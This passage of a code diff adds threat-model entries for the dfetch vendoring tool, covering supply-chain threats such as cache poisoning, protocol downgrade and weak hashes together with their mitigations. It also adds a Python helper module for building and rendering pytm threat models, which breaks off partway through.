+    "details": "A fetched repository may itself contain nested dependency references - Git submodules, package manifest files (package.json, requirements.txt, Cargo.toml, CMakeLists.txt), or source-level include directives.  If the consuming build system or test runner processes these references, it triggers additional fetches from sources not declared or reviewed in the primary manifest.  These secondary fetches bypass all manifest-level controls: no integrity hash, no code review of the source URL, and no audit trail in the vendored file's own dependency record.",
+    "Likelihood Of Attack": "Low",
+    "severity": "Medium",
+    "condition": "target.storesSensitiveData is True and target.hasWriteAccess is True and target.controls.validatesInput is False and target.controls.isHardened is False",
+    "prerequisites": "The fetched repository contains nested dependency declarations.  The consuming build system automatically resolves them without operator review.  The attacker controls or compromises one of the nested dependency sources, or modifies the primary repository's nested declarations.",
+    "mitigations": "Treat all fetched source code as untrusted until the build system that consumes it also enforces dependency integrity.  Audit vendored repositories for the presence of nested package manifests or submodule entries.  Where possible, export only the required source files rather than the full repository tree.  Document and enforce that vendored content is consumed as static source, not as an independently resolved dependency graph.",
+    "example": "A C library vendored via dfetch contains a CMakeLists.txt that uses FetchContent to pull a formatting library from a GitHub URL at build time.  The downstream project's CMake build silently downloads and compiles the external source; if the formatting library's URL is compromised, the build executes the attacker's C code without any integrity check by the vendoring tool.",
+    "references": "https://capec.mitre.org/data/definitions/186.html, https://cwe.mitre.org/data/definitions/829.html"
+  },
+  {
+    "SID": "DFT-23",
+    "target": [
+      "Dataflow"
+    ],
+    "description": "Replay or freeze attack delivers stale content to suppress security updates",
+    "details": "A network-positioned attacker or compromised caching intermediary intercepts a dependency fetch and returns a previously-cached, older response - one that may contain known vulnerabilities already fixed in current versions.  Because the response is served with a valid status code and no cryptographic freshness mechanism is checked, the build tool accepts the stale content as if it were current.  The attack suppresses security updates without triggering any alert and can persist as long as the attacker controls the caching layer.",
+    "Likelihood Of Attack": "Low",
+    "severity": "Medium",
+    "condition": "target.controls.providesIntegrity is False and target.controls.isHardened is False and target.controls.hasAccessControl is False and target.controls.isNetworkFlow is True",
+    "prerequisites": "A caching proxy, BGP-hijacked resolver, or network-adjacent attacker can serve stale responses for the targeted URL.  The build tool does not verify a cryptographic integrity hash or signed timestamp on the returned content.  The attacker knows the version the consumer is expecting and has access to an older, vulnerable copy.",
+    "mitigations": "Pin dependencies to cryptographic integrity hashes so stale content is detected by hash mismatch.  Use HTTPS for all registry and VCS connections to prevent trivial interception of the transport layer.  Avoid relying on shared or third-party caching layers for security-sensitive dependency resolution.  Verify that the resolved version matches the declared pin, not just the content hash.",
+    "example": "A shared corporate proxy caches an archive response for a commonly-fetched library.  An attacker with access to the proxy serves a cached copy of an older, vulnerable version whenever the current version is requested.  Because the manifest uses an http:// URL and no integrity hash is declared, the stale response is accepted silently.",
+    "references": "https://capec.mitre.org/data/definitions/60.html, https://cwe.mitre.org/data/definitions/494.html"
+  },
+  {
+    "SID": "DFT-24",
+    "target": [
+      "Datastore"
+    ],
+    "description": "Local dependency cache or metadata store poisoned to suppress integrity alerts",
+    "details": "Build tools maintain local caches or metadata records to avoid redundant network fetches and to detect when dependencies are out of date.  An attacker with local filesystem write access - through a compromised developer workstation, a build step running attacker code, or a supply-chain-injected pre-install hook - can overwrite cached content or recorded hashes.  The tool then reads the poisoned cache on subsequent runs, silently serving malicious content as if it were the legitimate cached dependency and suppressing any update or integrity alert.",
+    "Likelihood Of Attack": "Low",
+    "severity": "High",
+    "condition": "target.storesSensitiveData is False and target.hasWriteAccess is True and target.controls.providesIntegrity is False and target.controls.isHardened is False and target.controls.validatesInput is False",
+    "prerequisites": "The attacker has write access to the local filesystem paths used for dependency caching or metadata storage.  The build tool reads the cache without re-verifying the content against a remote integrity source.  The cache format is well-understood and the attacker knows which hashes or metadata fields to modify to suppress detection.",
+    "mitigations": "Treat local caches as untrusted secondary sources - re-verify cached content against a pinned integrity hash before use.  Restrict filesystem permissions on cache directories to the running process user.  Sign or MAC-protect metadata records so tampering is detectable.  On CI runners, clear caches entirely rather than restoring potentially-compromised cache artifacts.",
+    "example": "A malicious post-install hook from a compromised dev dependency modifies the vendoring tool's metadata files, replacing the recorded hash for a security-critical vendored library with the hash of a backdoored version it also writes to the vendor directory.  The next dependency check reports all dependencies as up-to-date.",
+    "references": "https://capec.mitre.org/data/definitions/17.html, https://cwe.mitre.org/data/definitions/494.html"
+  },
+  {
+    "SID": "DFT-25",
+    "target": [
+      "Datastore"
+    ],
+    "description": "Forged or unverifiable provenance attestation conceals malicious build output",
+    "details": "Build pipelines and package registries increasingly publish provenance attestations (SLSA provenance, Sigstore signatures, CycloneDX SBOMs) to allow consumers to verify what was built and how.  If an attacker controls the build environment or a privileged step in the release pipeline, they can generate and publish a plausible-looking attestation that describes a clean build while the actual artifact contains malicious code.  Consumers who do not independently verify attestation authenticity - or for whom verification tooling is not available - cannot distinguish the forged attestation from a legitimate one.",
+    "Likelihood Of Attack": "Low",
+    "severity": "High",
+    "condition": "target.controls.usesCodeSigning is False and target.hasWriteAccess is True and target.storesSensitiveData is False and target.controls.providesIntegrity is False",
+    "prerequisites": "The attacker has write access to the artifact store or can inject a step into the release pipeline.  Consumers do not independently verify attestation signatures against a transparency log.  The attestation format does not bind the attestation cryptographically to a build environment that the consumer can audit independently.",
+    "mitigations": "Sign all provenance attestations with a key whose public component is published to an append-only transparency log (e.g. Sigstore Rekor).  Enforce that consumers verify attestation signatures before installing.  Require SLSA Build Level 2+ provenance so the build environment itself is attested.  Separate the attestation-generation step from the code-producing step and use a dedicated signing identity with narrow write scope.",
+    "example": "An attacker who compromises the release pipeline injects a backdoor into the published wheel before it is signed.  They also generate a CycloneDX SBOM that describes the clean, unmodified source - using the same attestation action - and publish both together on the registry.  A consumer who reviews the SBOM component list sees nothing suspicious, because the SBOM was generated from the declared source manifest after the backdoor was already inserted.",
+    "references": "https://slsa.dev/spec/v1.0/threats#e-build-process, https://slsa.dev/spec/v1.0/threats#f-artifact-publication, https://capec.mitre.org/data/definitions/39.html, https://cwe.mitre.org/data/definitions/345.html"
+  },
+  {
+    "SID": "DFT-26",
+    "target": [
+      "Process"
+    ],
+    "description": "Protocol or transport downgrade forces connection over insecure channel",
+    "details": "VCS clients and HTTP libraries implement protocol negotiation that can be exploited by a network-adjacent attacker.  By blocking or corrupting TLS or SSH handshakes, the attacker causes the client to fall back to a weaker, unencrypted protocol - HTTP instead of HTTPS, plain SVN instead of svn+https://, or git:// instead of SSH.  The downgraded connection exposes the full content of the dependency fetch to interception and substitution.  Applications that do not explicitly reject protocol-downgrade responses - by enforcing a minimum acceptable protocol in their configuration - are silently redirected to the insecure channel.",
+    "Likelihood Of Attack": "Low",
+    "severity": "High",
+    "condition": "target.controls.isHardened is False and target.controls.providesIntegrity is False and target.controls.invokesSubprocess is True",
+    "prerequisites": "The VCS client or HTTP library performs protocol negotiation and has a plaintext fallback enabled.  The attacker is network-adjacent and can block or corrupt TLS or SSH handshake packets.  The application configuration does not enforce a minimum acceptable protocol or reject plaintext-fallback connections.",
+    "mitigations": "Configure VCS clients and HTTP libraries to disable plaintext fallback explicitly.  Enforce HTTPS-only or SSH-only in the tool's manifest schema by rejecting non-TLS URL schemes at parse time.  Use HSTS-preloaded hosts where available.  Monitor outbound connection logs for unexpected protocol changes.",
+    "example": "An attacker on the same network segment as a CI runner blocks the TLS handshake to a self-hosted SVN server.  The SVN client falls back to the plain svn:// protocol.  Because the manifest URL uses svn+https:// but the client accepts the downgraded connection, the attacker injects a malicious payload into the unencrypted SVN response.",
+    "references": "https://capec.mitre.org/data/definitions/220.html, https://cwe.mitre.org/data/definitions/757.html"
+  },
+  {
+    "SID": "DFT-27",
+    "target": [
+      "Process"
+    ],
+    "description": "Build or release triggered from unofficial source fork or unprotected branch",
+    "details": "An attacker who can influence CI/CD trigger parameters - through a misconfigured release workflow, an impersonated webhook, or a push to an unprotected branch that triggers publishing - causes the build to consume source from an unofficial fork or experimental branch rather than the protected default branch.  The artifact produced is indistinguishable from a legitimate build and may be signed with the project's own publish credential if the build environment does not validate the source ref.  SLSA calls this category 'external build parameters' (threat D): even when a trusted build platform is used, the inputs that feed into it must be verified.",
+    "Likelihood Of Attack": "Low",
+    "severity": "High",
+    "condition": "target.controls.isHardened is False and target.controls.isCiPipeline is True",
+    "prerequisites": "The release workflow accepts the source repository or branch as an external parameter rather than hardcoding it, or branch protection does not cover all refs that trigger publishing.  The attacker can create a fork or push to an unprotected branch.",
+    "mitigations": "Hardcode the source repository and branch in the release workflow - do not accept them as external parameters.  Restrict release triggers to tags pushed to the protected default branch only.  Record the exact source ref in provenance attestation and verify it against a declared allowlist of trusted refs before publishing.  Aim for SLSA Build Level 3 so the build platform is the authority on what was built.",
+    "example": "A release workflow fires on any pushed tag.  An attacker with repository write access pushes a tag on a non-default branch containing a backdoor.  The workflow builds and signs the artifact; the attestation records the correct repository but the wrong branch, which no automated consumer check catches.",
+    "references": "https://slsa.dev/spec/v1.0/threats#d-external-build-parameters, https://capec.mitre.org/data/definitions/186.html, https://cwe.mitre.org/data/definitions/494.html"
+  },
+  {
+    "SID": "DFT-28",
+    "target": [
+      "Datastore"
+    ],
+    "description": "CI/CD build cache poisoned to silently substitute a malicious compiled artifact",
+    "details": "CI/CD platforms share build caches across pipeline runs to reduce build times.  If a less-privileged workflow (e.g. a pull-request build triggered from a fork) can write to a cache key that a subsequent privileged workflow (e.g. a release build) will restore, an attacker controls what the release build receives without touching the source code.  The restored cache entry bypasses all source-level security controls: no rebuild from source, no compile-time analysis, and no provenance check.  SLSA identifies this as threat E6 ('poison the build cache').",
+    "Likelihood Of Attack": "Low",
+    "severity": "High",
+    "condition": "target.controls.isHardened is False and target.hasWriteAccess is True and target.storesSensitiveData is False",
+    "prerequisites": "The CI/CD platform shares a cache namespace between pull-request and release builds.  Cache keys are predictable and writable by a fork-triggered workflow.  Restored cache entries are consumed without re-verifying their integrity against build-input hashes.",
+    "mitigations": "Use separate, namespace-isolated caches for pull-request and release builds.  Derive cache keys from a cryptographic hash of all build inputs so any changed input invalidates the entry.  For release builds, disable cache restoration entirely and build from clean state.  Apply SLSA Build Level 3 isolation so each build runs in a fresh, unshared environment.",
+    "example": "A fork's malicious CI step writes a backdoored compiled extension to the shared GitHub Actions cache under the key the next release build will restore.  The release build restores the poisoned entry, packages the backdoored extension into the wheel, and publishes it - without the substitution appearing in any source diff.",
+    "references": "https://slsa.dev/spec/v1.0/threats#e-build-process, https://capec.mitre.org/data/definitions/17.html, https://cwe.mitre.org/data/definitions/494.html"
+  },
+  {
+    "SID": "DFT-29",
+    "target": [
+      "Process"
+    ],
+    "description": "Signing key or short-lived publish credential exfiltrated from build environment",
+    "details": "The release build environment holds short-lived credentials that grant the right to publish under the project's identity: OIDC tokens, signing private keys, or scoped API tokens.  An attacker who can execute code in that environment - through a compromised dependency installed without hash pinning, a malicious step injected via a pull-request workflow misconfiguration, or a backdoored CI action - can read and exfiltrate these credentials.  Armed with a valid publish token the attacker can upload a backdoored artifact through the expected registry path, completely outside the project's CI/CD pipeline.  SLSA identifies this as threat E5 ('steal cryptographic secrets').",
+    "Likelihood Of Attack": "Low",
+    "severity": "Very High",
+    "condition": "target.controls.isHardened is False and target.controls.isCiPipeline is True",
+    "prerequisites": "A credential with publish rights is present in the build environment.  The build and publish steps are not fully isolated: code running in the build step can read the credential used by the publish step.  Egress from the build environment is not blocked, allowing the credential to be transmitted to an attacker-controlled endpoint.",
+    "mitigations": "Restrict publish credentials to a dedicated deployment environment that requires an explicit approval gate before execution.  Use OIDC-based short-lived credentials (not long-lived API tokens) to limit the window of exploitation.  Block all non-allowlisted egress from the build environment so credential exfiltration channels are closed.  Require mandatory second-approver review before the deployment environment is unlocked.",
+    "example": "A compromised third-party CI action that was not updated to a newer SHA reads the OIDC token from the runner environment and POSTs it to an attacker-controlled endpoint.  The attacker uses the token to publish a backdoored package to PyPI under the project's trusted publisher identity before the token's five-minute expiry.",
+    "references": "https://slsa.dev/spec/v1.0/threats#e-build-process, https://capec.mitre.org/data/definitions/560.html, https://cwe.mitre.org/data/definitions/522.html"
+  },
+  {
+    "SID": "DFT-30",
+    "target": [
+      "Process"
+    ],
+    "description": "Weak or deprecated hash algorithm allows collision-based integrity bypass",
+    "details": "Integrity verification systems that accept MD5 or SHA-1 digests are vulnerable to practical collision attacks.  An attacker who can craft a malicious archive whose digest matches a declared hash passes verification while delivering different content.  Even for currently unbroken algorithms, a manifest that permits weak algorithm prefixes provides a false sense of security: a user who copy-pastes an MD5 checksum from a legacy download page believes their dependency is verified when it is not.  SLSA identifies this as threat M2 ('exploit cryptographic hash collisions') and requires verification using secure hash algorithms.",
+    "Likelihood Of Attack": "Low",
+    "severity": "High",
+    "condition": "target.controls.providesIntegrity is True and target.controls.hashVerification is True",
+    "prerequisites": "The manifest schema permits weak hash algorithm prefixes (e.g. md5:, sha1:) in the integrity.hash field.  A user has added a weak hash to a manifest entry.  An attacker can influence the content served for that dependency.",
+    "mitigations": "Reject MD5 and SHA-1 prefixes at schema validation time, accepting only sha256:, sha384:, and sha512:.  Document clearly that only these algorithms are acceptable.  Review minimum acceptable algorithms against NIST SP 800-131A guidance as cryptographic recommendations evolve.",
+    "example": "A developer adds an integrity hash using SHA-1 (sha1:<hex>) because the upstream's download page only lists an MD5 and a SHA-1 checksum.  An attacker who controls the archive server crafts a collision and substitutes a backdoored archive that produces the same SHA-1 digest, passing dfetch's integrity check.",
+    "references": "https://slsa.dev/spec/v1.0/threats#m-verification, https://capec.mitre.org/data/definitions/459.html, https://cwe.mitre.org/data/definitions/328.html, https://csrc.nist.gov/publications/detail/sp/800-131a/rev-2/final"
+  },
+  {
+    "SID": "DFT-31",
+    "target": [
+      "Dataflow"
+    ],
+    "description": "Upstream source publishes no SLSA Source provenance attestation — consumer cannot verify upstream security controls",
+    "details": "Source provenance attestations and Verification Summary Attestations (VSAs) allow consumers to verify that a specific revision of an upstream repository was created under a defined set of source-level controls.  When a dependency management tool fetches VCS content without checking for such attestations, there is no cryptographic evidence that any minimum controls were applied: branch protection, mandatory review, immutable history, or ancestry enforcement may all be absent.  The consumer is forced to rely on the reputation of the upstream host alone rather than verifiable, tamper-resistant policy.  SLSA Source Level 2+ requires repositories to generate Source Provenance Attestations contemporaneously with branch updates; without tooling to fetch and verify these attestations the consumer has no auditable chain to inspect.",
+    "Likelihood Of Attack": "Medium",
+    "severity": "Medium",
+    "condition": "target.controls.providesIntegrity is False and target.controls.usesCodeSigning is False and target.controls.isNetworkFlow is True",
+    "prerequisites": "The upstream VCS host does not publish SLSA Source Provenance Attestations or VSAs for the fetched revision.  The consuming tool has no manifest field to declare the expected SLSA source level and no mechanism to fetch or verify upstream source attestations.  The consuming project has no policy requiring a minimum upstream SLSA source level.",
+    "mitigations": "Prefer upstream projects that publish SLSA Source Level 2+ VSAs or Source Provenance Attestations.  Add a declarative field to the dependency manifest allowing authors to record the minimum acceptable SLSA source level for each dependency.  Implement tooling to fetch and verify upstream VSAs against a transparency log during dependency update operations.  Until such tooling exists, manually audit the upstream repository's branch-protection and review settings before accepting a new dependency.",
+    "example": "A project declares a Git dependency pinned to a commit SHA on a public GitHub repository.  The upstream has no branch protection, no mandatory review, and no source provenance attestations.  A single maintainer introduces a backdoor in a direct commit.  The consumer has no attestation to inspect that would reveal the absence of review — the SHA and TLS transport are intact, but they provide no assurance about the upstream development process.",
+    "references": "https://slsa.dev/spec/v1.2/source-requirements, https://slsa.dev/spec/v1.0/threats#a-producer"
+  },
+  {
+    "SID": "DFT-32",
+    "target": [
+      "Datastore"
+    ],
+    "description": "Upstream source enforces no mandatory two-party review — single contributor can introduce changes without independent verification",
+    "details": "SLSA Source Level 4 requires every change to a protected branch to be approved by two trusted individuals before merge.  An upstream project that enforces no mandatory code review presents an elevated risk even when no account is compromised and no maintainer is acting maliciously: a single mistake, a coerced change, or an unreviewed commit bypasses independent verification by design.  This is structurally distinct from DFT-11 (account compromise enabling unauthorised merge) and DFT-19 (intentional maintainer sabotage) — no attack is required.  The absence of two-party review as a technical control means there is no second person whose approval would have caught the change.",
+    "Likelihood Of Attack": "Medium",
+    "severity": "Medium",
+    "condition": "target.storesSensitiveData is True and target.hasWriteAccess is True and target.controls.hasAccessControl is False",
+    "prerequisites": "The upstream repository does not enforce mandatory two-party code review on its protected branches.  Any contributor with push or merge rights can introduce changes without a second reviewer approving.  The consuming project fetches from this repository and uses the vendored content as a build input.",
+    "mitigations": "Prefer upstream projects that enforce mandatory code review and publish SLSA Source Level 4 VSAs.  For high-risk dependencies, require explicit human review of every upstream commit before advancing the pin — irrespective of whether the upstream enforces review internally.  Document the upstream's code-review posture and SLSA source level in the project's risk register alongside the dependency entry.",
+    "example": "A project depends on a utility library maintained by a single developer who merges all contributions without requiring a second reviewer.  A coerced commit introduces a subtle timing side-channel that leaks build-environment environment variables at runtime.  Commit-SHA pinning, transport security, and integrity hashes all pass — the absence of independent review is the sole missed control.",
+    "references": "https://slsa.dev/spec/v1.2/source-requirements#level-4, https://slsa.dev/spec/v1.0/threats#a-producer, https://capec.mitre.org/data/definitions/186.html"
+  },
+  {
+    "SID": "DFT-33",
+    "target": [
+      "Dataflow"
+    ],
+    "description": "Upstream default-branch history rewritten — ancestry broken, pinned SHA orphaned or made unreachable",
+    "details": "DFT-05 and DFT-21 cover mutable references (branch or tag) silently force-pushed to a new commit.  DFT-33 addresses a distinct scenario: the entire default-branch history is rewritten via interactive rebase, filter-branch, or a force-push to the protected default branch itself, breaking the immutable revision lineage that SLSA Source Level 2 requires.  A consumer who pinned to a previously-audited commit SHA may find that SHA orphaned — present in the object database but no longer reachable from any branch tip — or absent entirely after a garbage-collection pass.  The SHA remains cryptographically valid, but the surrounding history that justified the original review decision is severed.  Most vendoring tools have no mechanism to verify that a pinned SHA remains reachable in the upstream's default branch after a fetch.",
+    "Likelihood Of Attack": "Low",
+    "severity": "Medium",
+    "condition": "target.controls.isHardened is False and target.controls.providesIntegrity is False and target.controls.isNetworkFlow is True",
+    "prerequisites": "The upstream repository does not enforce ancestry protection on its default branch — force-pushes to main are permitted.  An attacker with repository write access, or a maintainer acting intentionally, rewrites the branch history.  The consuming project has previously pinned to a commit SHA from the original history; that SHA becomes unreachable after the rewrite.",
+    "mitigations": "Pin VCS dependencies to immutable commit SHAs and, after each fetch, verify that the pinned SHA is reachable from the upstream's current default branch tip.  Prefer upstream repositories that enforce SLSA Source Level 2+ ancestry protection (no force-push policy on protected branches).  Use Source Provenance Attestations that include lineage records for additional assurance.  Monitor upstream repositories for unexpected history rewrites as part of regular dependency hygiene.",
+    "example": "A project pins a dependency to commit abc123, which was reviewed before acceptance.  The upstream maintainer later performs a history rewrite to strip accidentally committed secrets, producing new commit hashes throughout the tree.  The original abc123 becomes an orphan — not reachable from main.  A fresh clone no longer contains abc123, making it impossible to verify the relationship between the pinned commit and the current release branch, and silently breaking any reproducibility check.",
+    "references": "https://slsa.dev/spec/v1.2/source-requirements#level-2, https://capec.mitre.org/data/definitions/690.html, https://cwe.mitre.org/data/definitions/345.html"
+  }
+]

--- a/security/tm_common.py
+++ b/security/tm_common.py
@@ -1,0 +1,376 @@
+"""Shared building blocks for the dfetch threat models.
+
+Both supply-chain and usage models import from here.  No pytm objects at
+module level, so it is safe to import before ``TM.reset()``.
+"""
+
+import html
+import os
+import sys
+from collections.abc import Callable
+from dataclasses import dataclass, field
+from typing import Any, Literal
+
+from pytm import Assumption, Boundary, Data, Element
+from pytm.report_util import ReportUtils
+
+THREATS_FILE = os.path.join(os.path.dirname(__file__), "threats.json")
+
+
+@dataclass
+class ControlAssessment:
+    """Implementation state and risk classification for a control."""
+
+    status: Literal["implemented", "planned", "gap"] = "implemented"
+    risk: Literal["Critical", "High", "Medium", "Low"] = "Medium"
+    stride: list[str] = field(default_factory=list)
+
+
+@dataclass
+class Control:
+    """A security control or known gap against a specific threat."""
+
+    id: str
+    name: str
+    description: str
+    assets: list[str] = field(default_factory=list)
+    threats: list[str] = field(default_factory=list)
+    reference: str = ""
+    assessment: ControlAssessment = field(default_factory=ControlAssessment)
+
+    @property
+    def status(self) -> str:
+        """Delegation to assessment.status for backwards-compatible access."""
+        return self.assessment.status
+
+    def to_pytm(self) -> str:
+        """Return a human-readable label used in traceability comments."""
+        return f"[{self.id}] {self.name}"
+
+
+def build_asset_controls_index(
+    controls: list[Control],
+    valid_asset_ids: set[str],
+) -> dict[str, list[Control]]:
+    """Return an asset-ID → control list mapping built from *controls*."""
+    index: dict[str, list[Control]] = {}
+    for ctrl in controls:
+        for asset_id in ctrl.assets:
+            if asset_id not in valid_asset_ids:
+                raise ValueError(
+                    f"Unknown asset ID '{asset_id}' in control '{ctrl.id}: {ctrl.name}'"
+                )
+            index.setdefault(asset_id, []).append(ctrl)
+    return index
+
+
+# ── Shared trust-boundary factories ─────────────────────────────────────────
+#
+# Called *after* TM.reset() in each model so the created Boundary objects
+# register with the correct TM singleton.
+
+
+def make_dev_env_boundary() -> Boundary:
+    """Create the *Local Developer Environment* trust boundary."""
+    b = Boundary("Local Developer Environment")
+    b.description = (
+        "Developer workstation or local CI runner.  Assumed trusted at invocation "
+        "time.  Hosts the manifest (``dfetch.yaml``), vendor directory, dependency "
+        "metadata (``.dfetch_data.yaml``), and patch files."
+    )
+    return b
+
+
+def make_network_boundary(description: str | None = None) -> Boundary:
+    """Create the *Internet* trust boundary."""
+    b = Boundary("Internet")
+    b.description = description or (
+        "All traffic crossing the local/remote boundary.  TLS enforcement is the "
+        "responsibility of the OS and VCS clients; dfetch does not enforce HTTPS "
+        "on manifest URLs."
+    )
+    return b
+
+
+# ── Assumption factories ─────────────────────────────────────────────────────
+
+
+def make_supply_chain_assumptions() -> list[Assumption]:
+    """Return the ``Assumption`` objects scoped to the supply-chain model."""
+    return [
+        Assumption(
+            "Trusted workstation",
+            description=(
+                "Developer workstations are trusted at development and commit time.  "
+                "A compromised workstation is outside the scope of this model."
+            ),
+        ),
+        Assumption(
+            "CI runner posture",
+            description=(
+                "GitHub Actions environments inherit the security posture of the "
+                "GitHub-hosted runner.  Ephemeral runner isolation is provided by GitHub."
+            ),
+        ),
+        Assumption(
+            "Harden-runner in block mode",
+            description=(
+                "The ``harden-runner`` egress policy is set to ``block`` with an "
+                "allowlist of permitted endpoints.  Outbound network connections from "
+                "CI runners are blocked unless explicitly permitted."
+            ),
+        ),
+        Assumption(
+            "Build deps without hash pinning",
+            description=(
+                "dfetch's own build and dev dependencies are installed without "
+                "``--require-hashes``, so a compromised PyPI mirror can substitute "
+                "malicious build tools."
+            ),
+        ),
+    ]
+
+
+def make_usage_assumptions() -> list[Assumption]:
+    """Return the ``Assumption`` objects scoped to the runtime-usage model."""
+    return [
+        Assumption(
+            "Trusted workstation",
+            description=(
+                "Developer workstations are trusted at dfetch invocation time.  "
+                "A compromised workstation is outside the scope of this threat model."
+            ),
+        ),
+        Assumption(
+            "TLS delegated to client",
+            description=(
+                "TLS certificate validation is delegated to the OS trust store and the "
+                "git / svn / urllib clients.  dfetch does not independently validate "
+                "certificates."
+            ),
+        ),
+        Assumption(
+            "No persisted secrets",
+            description=(
+                "No runtime secrets are persisted to disk by dfetch itself.  "
+                "VCS credentials are managed by the OS keychain, SSH agent, or CI "
+                "secret store."
+            ),
+        ),
+        Assumption(
+            "Optional integrity hash",
+            description=(
+                "The ``integrity.hash`` field in the manifest is optional.  Archive "
+                "dependencies without it have no content-authenticity guarantee beyond "
+                "TLS transport, which is itself absent for plain ``http://`` URLs."
+            ),
+        ),
+        Assumption(
+            "Mutable VCS references",
+            description=(
+                "Branch- and tag-pinned Git dependencies are mutable references.  "
+                "Upstream force-pushes silently change what is fetched without "
+                "triggering a manifest diff."
+            ),
+        ),
+        Assumption(
+            "Manifest under code review",
+            description=(
+                "The manifest (``dfetch.yaml``) is under version control and subject to "
+                "code review.  An adversary with write access to the manifest can redirect "
+                "fetches to attacker-controlled sources; this threat is addressed at the "
+                "code-review boundary, not within dfetch itself."
+            ),
+        ),
+        Assumption(
+            "dfetch scope boundary",
+            description=(
+                "dfetch is responsible only for its own security posture.  The security "
+                "of fetched third-party source code is the responsibility of the manifest "
+                "author who selects and pins each dependency."
+            ),
+        ),
+        Assumption(
+            "No HTTPS enforcement",
+            description=(
+                "HTTPS enforcement is the responsibility of the manifest author.  dfetch "
+                "accepts ``http://``, ``svn://``, and other non-TLS scheme URLs as written "
+                "- it does not upgrade or reject them."
+            ),
+        ),
+    ]
+
+
+def render_controls_section(controls: list[Control]) -> str:
+    """Render controls and gaps as a markdown section appended to the report."""
+    implemented = [c for c in controls if c.status == "implemented"]
+    gaps = [c for c in controls if c.status == "gap"]
+
+    parts: list[str] = []
+
+    def _render_control(c: Control, *, is_gap: bool) -> str:
+        meta: list[str] = [f"**Risk:** {c.assessment.risk}"]
+        if c.assessment.stride:
+            meta.append(f"**STRIDE:** {', '.join(c.assessment.stride)}")
+        label = "**Affects threats:**" if is_gap else "**Mitigates:**"
+        if c.threats:
+            meta.append(f"{label} {', '.join(c.threats)}")
+        lines = [f"### {c.id}: {c.name}", "  \n".join(meta)]
+        if c.reference:
+            lines.append(f"**Reference:** `{c.reference}`")
+        lines.append(f"\n{c.description}")
+        return "\n".join(lines)
+
+    if implemented:
+        parts.append("## Controls\n")
+        parts.extend(_render_control(c, is_gap=False) for c in implemented)
+
+    if gaps:
+        parts.append("## Gaps\n")
+        parts.extend(_render_control(c, is_gap=True) for c in gaps)
+
+    return "\n\n".join(parts)
+
+
+def _render_finding(f: Any) -> str:
+    """Render one pytm Finding to an HTML ``<details>`` block string."""
+
+    def _esc(attr: str) -> str:
+        return html.escape(str(getattr(f, attr, "")))
+
+    def _esc_ml(attr: str) -> str:
+        return html.escape(str(getattr(f, attr, ""))).replace("\n", "<br>")
+
+    return (
+        "<details>\n  <summary>\n    "
+        + _esc("threat_id")
+        + " - "
+        + _esc("description")
+        + "\n  </summary>\n  <h6>Targeted Element</h6>\n  <p>"
+        + _esc("target")
+        + "</p>\n  <h6>Severity</h6>\n  <p>"
+        + _esc("severity")
+        + "</p>\n  <h6>Example Instances</h6>\n  <p>"
+        + _esc_ml("example")
+        + "</p>\n  <h6>Mitigations</h6>\n  <p>"
+        + _esc_ml("mitigations")
+        + "</p>\n  <h6>References</h6>\n  <p>"
+        + _esc_ml("references")
+        + "</p>\n</details>\n"
+    )
+
+
+def apply_report_utils_patch() -> None:
+    """Fix pytm's getInScopeFindings, which always renders empty finding details.
+
+    Two bugs interact:
+    1. Finding.target is a str (element name), so getattr(str, 'inScope', False)
+       is always False - the default implementation returns [] for every element.
+    2. Python's string.Formatter pre-expands {item:call:X} tokens that appear
+       inside format specs before the outer format_field sees the spec.  The
+       template uses getInScopeFindings as an outer call with getThreatId etc.
+       in its sub-template; those inner tokens are evaluated on the *element*
+       (not each finding) during Python's spec-expansion step, producing empty
+       strings that get baked into the spec before getInScopeFindings can loop.
+
+    Fix: replace getInScopeFindings with one that renders each in-scope finding
+    to an HTML string directly, so no sub-template is needed in the report.
+    element.findings is already scoped to that element, so no target lookup
+    is required - the in-scope check on the element itself is sufficient.
+    """
+
+    def _fixed(element: Any) -> str:
+        if isinstance(element, Data):
+            findings = [
+                f
+                for flow in getattr(element, "carriedBy", [])
+                for f in getattr(getattr(flow, "sink", None), "findings", [])
+            ]
+            if not findings:
+                return ""
+            rendered = "".join(_render_finding(f) for f in findings)
+            return "\n**Threats**\n\n" + rendered
+        if not isinstance(element, Element) or not element.inScope:
+            return ""
+        findings = element.findings
+        if not findings:
+            return ""
+        rendered = "".join(_render_finding(f) for f in findings)
+        return "\n**Threats**\n\n" + rendered
+
+    ReportUtils.getInScopeFindings = staticmethod(_fixed)
+
+
+def run_model(build_model_fn: Callable[[], Any], controls: list[Control]) -> None:
+    """Run a threat model from a ``__main__`` entry point.
+
+    Calls *build_model_fn* then either renders a report (when ``--report
+    <template>`` is on the command line) or runs the default pytm processing.
+    """
+    tm = build_model_fn()
+    if "--report" in sys.argv:
+        _idx = sys.argv.index("--report")
+        if _idx + 1 >= len(sys.argv) or sys.argv[_idx + 1].startswith("-"):
+            script = os.path.basename(sys.argv[0])
+            print(f"Usage: python {script} --report <template_path>", file=sys.stderr)
+            raise SystemExit(1)
+        tm.resolve()
+        print(tm.report(sys.argv[_idx + 1]))
+        print(render_controls_section(controls))
+    else:
+        tm.process()
+
+
+def make_attacker_profiles() -> list[Assumption]:
+    """Return Assumption objects describing the in-scope adversary classes."""
+    return [
+        Assumption(
+            "Attacker: Network-adjacent",
+            description=(
+                "Positioned on the same network segment as a CI runner or developer "
+                "workstation - shared cloud tenant, BGP hijack, compromised DNS resolver, "
+                "or corporate proxy.  Can intercept and modify unencrypted traffic "
+                "(http://, svn://) and inject HTTP redirects.  Cannot break correctly "
+                "implemented TLS or SSH."
+            ),
+        ),
+        Assumption(
+            "Attacker: Compromised upstream",
+            description=(
+                "A dependency maintainer account taken over via phishing, credential "
+                "stuffing, or MFA bypass - or a maintainer acting maliciously.  "
+                "Delivers attacker-controlled content over an authenticated channel; "
+                "transport security provides no protection.  Mitigated only by "
+                "commit-SHA pinning and human review before accepting any update."
+            ),
+        ),
+        Assumption(
+            "Attacker: Compromised registry or CDN",
+            description=(
+                "Holds write access to a public package registry (PyPI) or an archive "
+                "CDN node, or is BGP-adjacent to one.  Serves malicious content under "
+                "a valid TLS certificate - transport integrity does not detect "
+                "server-side substitution.  Only cryptographic content hashes or "
+                "signed attestations provide a defence."
+            ),
+        ),
+        Assumption(
+            "Attacker: Local filesystem",
+            description=(
+                "Holds write access to the developer workstation or CI runner working "
+                "tree - gained via a compromised dev dependency, malicious post-install "
+                "hook, or lateral movement.  Can tamper with ``.dfetch_data.yaml``, "
+                "patch files, and vendored source after dfetch writes them to disk."
+            ),
+        ),
+        Assumption(
+            "Attacker: Malicious manifest contributor",
+            description=(
